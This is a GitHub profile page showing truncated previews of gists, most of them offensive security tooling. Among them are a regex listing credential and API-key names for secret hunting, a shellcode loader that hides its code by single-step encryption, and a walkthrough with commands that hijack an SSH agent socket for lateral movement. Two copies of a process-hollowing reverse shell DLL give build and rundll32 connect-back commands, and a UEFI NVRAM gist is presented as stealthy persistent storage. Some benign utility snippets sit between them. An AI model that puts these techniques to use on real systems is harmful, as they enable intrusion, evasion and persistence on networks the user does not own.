Skip to content

Instantly share code, notes, and snippets.

View 11philip22's full-sized avatar
👽
planet rider

Philip 11philip22

👽
planet rider
66 followers · 68 following
  • /dev/chaos
View GitHub Profile
@h4x0r-dz
h4x0r-dz / Generic keys
Created May 5, 2022 09:15
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k
@jackullrich
jackullrich / mainc.c
Last active November 3, 2023 17:20
Single Step Encryption/Decryption
#include <Windows.h>
LONG SingleStepEncryptDecrypt(EXCEPTION_POINTERS* ExceptionInfo);
typedef VOID(__stdcall* Shellcode)();
LPBYTE ShellcodeBuffer;
ULONG_PTR PreviousOffset;
ULONG_PTR CurrentOffset;
ULONGLONG InstructionCount;
DWORD dwOld;
@gerwin3
gerwin3 / make-vcard.py
Created January 23, 2021 16:16
Generate vCard using Python
"""
This little script can generate a valid .vcf (vCard). It will ask you to fill
in some details and write the vcf-file.
"""
def main():
print('Please enter contact details:')
first_name = input(' - First name : ')
last_name = input(' - Last name : ')
email = input(' - E-mail address : ')
@int0x80
int0x80 / SSH Agent Forwarding.md
Created January 7, 2021 00:59

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld
@EvanMcBroom
EvanMcBroom / pic-and-string-literals.md
Last active October 31, 2023 08:37
Position Independent Code and String Literals

Position Independent Code and String Literals

A common programming idiom when writing position independent code (PIC) is to expand a string literal into its individual characters when instantiating a local variable.

void f() {
    // Example 1: A normal instantiation with a string literal
    char a[]{ "a long string" };

 // Example 2: The Pic idiom for instantiating a string
@11philip22
11philip22 / process-hollow-shell-dll.c
Created November 26, 2020 10:41 — forked from FrankSpierings/process-hollow-shell-dll.c
Reverse shell which uses process hollowing technique
// docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll"
//
// Use -DDEBUG at compile time, for the logging printf messages.
// Use -DNON_MS_DLL_BLOCK at compile time, to block injection of non Microsoft DLL's into the host process.
// Use -DWAITFOR at compile time, to wait for the host process to finish.
//
// Run:
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe
@FrankSpierings
FrankSpierings / process-hollow-shell-dll.c
Last active August 30, 2022 20:46
Reverse shell which uses process hollowing technique
// docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll"
//
// Use -DDEBUG at compile time, for the logging printf messages.
// Use -DNON_MS_DLL_BLOCK at compile time, to block injection of non Microsoft DLL's into the host process.
// Use -DWAITFOR at compile time, to wait for the host process to finish.
//
// Run:
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe
@scragly
scragly / README.md
Last active November 14, 2020 15:24
QBittorrent WebAPI script for getting the size of all torrents.

Requires Python 3.6+

Only 3rd party dependancy is the Requests library. Install it with: python3 -m pip install requests

@FrankSpierings
FrankSpierings / func-params.py
Created February 3, 2020 19:20
Ghidra Script - Example of showing function call parameters within a function using the decompiler.
#Example of showing function call parameters within a function using the decompiler.
#@author Frank Spierings
#@category
#@keybinding
#@menupath
#@toolbar
import ghidra.app.decompiler.DecompInterface as DecompInterface
import ghidra.app.decompiler.ClangTokenGroup as ClangTokenGroup
@jthuraisamy
jthuraisamy / _README.md
Last active August 17, 2023 13:09
GospelRoom: Data Storage in UEFI NVRAM Variables

GospelRoom: Data Storage in UEFI NVRAM Variables

Behaviour

Persist data in UEFI NVRAM variables.

Benefits

  1. Stealthy way to store secrets and other data in UEFI.
  2. Will survive a reimaging of the operating system.